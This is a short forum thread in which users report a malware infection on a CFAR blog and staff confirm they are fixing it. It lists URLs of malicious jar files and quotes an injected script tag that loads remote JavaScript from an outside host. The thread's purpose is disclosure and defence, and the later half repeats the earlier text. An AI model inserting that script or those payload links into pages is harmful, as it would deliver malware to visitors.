Looks like the whole blog part of the site is infected.
Edit: I can’t pinpoint where the infection is and I can’t duplicate it on another computer, but in case it helps, here are the URLs of the jar files it’s trying to run:
http://barbarie.ch/pix/jar/java7.jar?r=1069897 http://barbarie.ch/pix/jar/javab.jar?r=313862 http://barbarie.ch/pix/jar/amor1.jar http://barbarie.ch/pix/jar/amor2.jar http://barbarie.ch/pix/jar/amor3.jar http://barbarie.ch/pix/jar/amor4.jar http://barbarie.ch/pix/jar/amor5.jar http://barbarie.ch/pix/jar/amor6.jar http://barbarie.ch/pix/jar/amor7.jar
I’m also putting a link to this info in the “Contact the CFAR Staff” form on the site.
Thanks. We have someone looking at it now.
In case they haven’t found it yet, it looks like the code that sets the mischief in motion is the following:
<div class="textwidget"><p><script type="text/javascript" src="http://www.balivilla.fr/jquery.php“></script></p>
(LW’s Markdown processor may add angle brackets around the URL that aren’t really there.)
Thanks; I believe it’s now fixed.
Looks like the whole blog part of the site is infected.
Edit: I can’t pinpoint where the infection is and I can’t duplicate it on another computer, but in case it helps, here are the URLs of the jar files it’s trying to run:
I’m also putting a link to this info in the “Contact the CFAR Staff” form on the site.
Thanks. We have someone looking at it now.
In case they haven’t found it yet, it looks like the code that sets the mischief in motion is the following:
(LW’s Markdown processor may add angle brackets around the URL that aren’t really there.)
Thanks; I believe it’s now fixed.